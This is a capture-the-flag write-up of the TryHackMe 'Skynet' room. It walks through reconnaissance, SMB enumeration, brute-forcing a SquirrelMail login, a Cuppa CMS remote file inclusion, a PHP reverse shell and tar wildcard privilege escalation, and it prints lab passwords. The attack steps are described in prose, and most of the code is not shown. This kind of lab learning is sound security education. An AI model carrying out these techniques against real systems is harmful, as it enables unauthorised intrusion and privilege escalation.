Skynet
Reconnaissance
Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)
Detailed Nmap Scan :
Command Breakdown:
(-sV): Service version
(-sC): Default nmap scripts
(-p): Specifying ports 22,80,110,139,143,445
(-oN nmap): Saving it into a files called nmap
Enumeration
Port 80: HTTP
Lets visit the website
It is a search engine, but nothing works if we search something , neither do any of the buttons work. The source code has nothing interesting as well
Lets run a gobuster scan to find hidden directories and files
Looks like we found some directories, but we are not allowed to access any of them
After a while we get another hit
The directory is called /squirrelmail
, lets visit it and see if we have access to it.
And we do, its a login form, so we need to find a username and a password.
Port 139,445: SMB
Lets use a tool called enum4linux
which is a tool that enumerates Samba services on a machine
Looking at the output, in the Share Enumeration section, the Share names print$ and IPC$ are common, but anonymous and milesdyson
are not common, and milesdyson
looks like a username, so lets add that to our notes.
Now lets try to access those shares using smbclient
After hitting enter for the password
We are logged in. Lets now explore.
There is a directory and a file, lets transfer the file to our machine and the files in the directory to our machine too.
I am only transferring the log1.txt
file because the other files are empty as shows in the ls output.
Lets now read the files that we transferred to our machine.
So the attention.txt
file tells us that all the employees passwords have been changed and all of them are required to change their passwords. And the second file looks like a password list, and the name of the file was log, it might be older passwords, and we can also theorize that someone might have not changed their password, for example the person who wrote the attention note, Miles Dyson. We can try to brute force the squirrel mail service we found on the webserver with the username milesdyson
and the password list we just saw.
Now I wanted to try using hydra
or burp
suite to do this, but I was looking at the walkthrough of John Hammond and the python script that he made was very interesting and valuable, so I made one and used that to find the correct password. Lets go through the steps he did.
Lets first go to the developer tools (Ctrl + Shift + i
) and then send a request with a random username and password. In the Network tab of the developer tools, we see a redirect.php
file get created when we hit login, lets look into that file.
Now lets copy the request , we can do that by right clicking on the file name and going to copy and then click copy as cURL
. We can now go to a cURL
to python code request code converter, now paste the code in their and then copy the python code to a file.
I'm going to create the file bruteforce.py
, once you do that we need to modify the code a bit to make it bruteforce the service with the username and password list we provide.
This is how the code looks before any modifications
And this is the code after modifications, I can try to explain what this code does, but I think John Hammond does a better job at doing that, so go watch the video he made if you want to understand the code.
Now if we save and run the code, we find the password
The password is cyborg007haloterminator
, which is also the answer to the first question in this room
Port 80: HTTP
We can now login into squirrel mail.
There are three emails that Miles Dyson received, the ones with (no subject) have nothing of interest, but the Samba Password reset email has something really interesting
We now have the password for SMB of Miles Dyson, which is )s{A&2Z=F^n_E.B'
.
Port 139,445: SMB
Now that we have the password for Miles Dyson's SMB server, we can login using smbclient
.
We are now logged in. Lets list what files or directories there are in the server.
Looking through the files, there is only one file in the notes directory that looks interesting, so lets transfer that file to our machine.
Now lets read the important.txt
file
Looks like the first line gives us a directory that we can visit on the webserver, so lets do that.
Nothing of interest here nor in the source code, lets run gobuster
to find hidden directories and files. Also the directory we just found is the answer to the second question in this room
We find an administrator page, lets go visit it.
Its a login page. If we try to use the credentials we found earlier, it does not work. Looking at the page we have the service name which is Cuppa CMS
so why don't we go to searchsploit and look if we have any exploits that we can use to exploit this service.
And we do, so lets copy the exploit to our directory.
We now can answer the third question in this room.
Exploitation
Reading through the scripts, it looks like we can see the /etc/passwd
file, so lets try looking at that file.
We need to change the target and alerts place holders as well
Looks like it works, so they also mentioned that we can run php files on the server with this exploit, so what if we write a command in a php file and send that to the server by opening a http server on our machine, we can do this because there is a remote file inclusion vulnerability on the web server.
So first lets make the file with the command, lets call it command.php
.
Lets see if the command whoami
works.
Now we have to start a http server so that the victim machine can connect back to us.
Now we have to run the curl command to connect to our machine and run the command.php file.
And it works as we get the right output. Now what if we change the command.php file to a reverse shell php file to get a reverse shell on the machine. We can find a reverse shell php file here.
Once you copy the file and change the IP to your tryhackme IP as they mentioned in the file, you can copy it to the directory where you will start the http server. Once you do that change the file in the curl URL and also start a Netcat reverse shell listener with the same IP in the php reverse shell file.
Once you do that, use the curl command. Also make sure you started the python http server
After you hit enter, you should get a reverse shell on the machine.
You can now read the user.txt which is the answer to the fourth question of this room.
And you can use these commands to stabilize your shell
Looking at the files and directories, there is a particular directory and file that looks interesting, which is /backups
and backup.sh
Lets read the file.
It looks like its changing directories into the /var/www/html
folder and then running a tar command with the other file in the /backups
directory. Looking at the tar command and at the *
symbol, I was thinking that there should be a exploit based on this so I went to google and searched for it and found it.
The part that we are interested in is this
I can try to explain what these command do, but not as good as John Hammond, so make sure to go there and look at what the commands do and mean.
The commands that we will use are: (Also make sure to cd to /var/www/html
before running the commands.)
Wait for a while and then run the sudo -l
command.
Now we can run all commands as root, so lets switch users to root.
You can also read the root flag which is the answer to the last question of the room.
Last updated